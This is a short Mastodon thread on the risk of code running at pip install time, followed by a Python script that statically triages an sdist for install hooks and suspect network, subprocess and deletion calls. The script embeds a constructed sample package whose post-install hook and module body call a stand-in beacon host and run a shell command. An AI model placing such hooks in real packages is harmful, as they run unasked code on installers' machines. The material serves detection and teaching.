sethmlarson (@sethmlarson@fosstodon.org)

An update on the release process, , and some thoughts on after talking about it with lots of folks.

https://sethmlarson.dev/security-developer-in-residence-weekly-report-33

djh (@djh@chaos.social)

@sethmlarson My hunch was always that 3rd party dependencies (PyPI) were the weakest link in the Python ecosystem.

If I pip install something today, during that installation arbitrary code can run with 1) full access to the filesystem and 2) network access, no?

I always wondered why that's treated as OK and there's very little to nothing out there taking care e.g. of sandboxing?

I'm not up to date here, tho, anything moving in this regard?

sethmlarson (@sethmlarson@fosstodon.org)

@djh Many packaging ecosystems have "build scripts" to access tools and libraries outside of the packaging ecosystem for legitimate reasons.

Sandboxing the build/install means malware authors will move the malicious code from the install stage to the library code itself for when you inevitably run the code you just installed.

This is why removing build scripts/isolating them to just virtualenv doesn't seem like a great trade-off considering the utility build scripts offer.
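The two replies above describe the same payload living in two places: in `setup.py`, where `pip install` of an sdist executes it, or in the package's own module, where it runs on first import. The script below is an added example, not code from either poster or from pip/setuptools. It builds a constructed sdist in memory (package name `demo_pkg`, beacon URL `http://example.invalid/`, both made up for the example) and statically triages every `.py` file in it: which stage it runs at, whether `setup()` overrides a command via `cmdclass` (the usual place for a post-install hook), and whether it imports or calls anything that reaches the network, a subprocess or the filesystem. The suspect-name lists are my own triage heuristics, not an authoritative set.

```python
"""Static triage of a Python sdist: which files run at install vs. import time,
and do they touch the network, subprocess or filesystem? (Added example.)"""
import ast
import io
import tarfile

# Heuristic watch-lists for triage; not exhaustive (assumption of this example).
SUSPECT_MODULES = {"subprocess", "socket", "urllib.request", "requests",
                   "http.client", "ctypes", "shutil"}
SUSPECT_CALLS = {"os.system", "os.popen", "os.remove", "shutil.rmtree", "exec",
                 "eval", "subprocess.run", "subprocess.Popen", "subprocess.call",
                 "urllib.request.urlopen", "socket.socket"}

# Constructed sample sdist contents. setup.py overrides the `install` command, so
# its run() executes as the installing user during `pip install demo_pkg-0.1.tar.gz`.
SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import subprocess, urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlopen("http://example.invalid/beacon")  # constructed URL
        subprocess.run(["id"])

setup(name="demo_pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# The same payload moved into the package body: an install-time sandbox never
# sees it, but it runs the first time `import demo_pkg` happens.
INIT_PY = '''
import subprocess, urllib.request
urllib.request.urlopen("http://example.invalid/beacon")  # constructed URL
subprocess.run(["id"])
'''


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_source(src):
    """Return (suspect imports, suspect calls, setup() hook kinds) found in src."""
    imports, calls, hooks = set(), set(), set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            imports.update(a.name for a in node.names if a.name in SUSPECT_MODULES)
        elif isinstance(node, ast.ImportFrom) and node.module in SUSPECT_MODULES:
            imports.add(node.module)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SUSPECT_CALLS:
                calls.add(name)
            if name == "setup":
                # cmdclass= replaces build/install commands with arbitrary classes.
                hooks.update(kw.arg for kw in node.keywords if kw.arg == "cmdclass")
    return imports, calls, hooks


def triage_sdist(tar_bytes):
    """Map each .py file in the sdist to its execution stage and findings."""
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith(".py"):
                continue
            src = tar.extractfile(member).read().decode("utf-8")
            rel = member.name.split("/", 1)[1] if "/" in member.name else member.name
            # setup.py is executed by the build frontend; everything else only on import.
            stage = "install" if rel == "setup.py" else "import"
            imports, calls, hooks = scan_source(src)
            findings[rel] = {"stage": stage, "imports": sorted(imports),
                             "calls": sorted(calls), "hooks": sorted(hooks)}
    return findings


def build_sample_sdist():
    """Constructed in-memory sdist for this example; not a real PyPI package."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, text in (("demo_pkg-0.1/setup.py", SETUP_PY),
                           ("demo_pkg-0.1/demo_pkg/__init__.py", INIT_PY)):
            data = text.encode("utf-8")
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for path, info in triage_sdist(build_sample_sdist()).items():
        print(f"{path} [{info['stage']}] hooks={info['hooks']} "
              f"imports={info['imports']} calls={info['calls']}")
```

To run this against a real package, fetch the sdist without installing it (`pip download --no-deps --no-binary=:all: <name>`) and pass the tarball bytes to `triage_sdist`. Note the asymmetry the output shows: `pip install --only-binary=:all:` keeps `setup.py` from ever running, but the findings for `demo_pkg/__init__.py` still apply the moment the package is imported, which is the trade-off the reply above describes.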
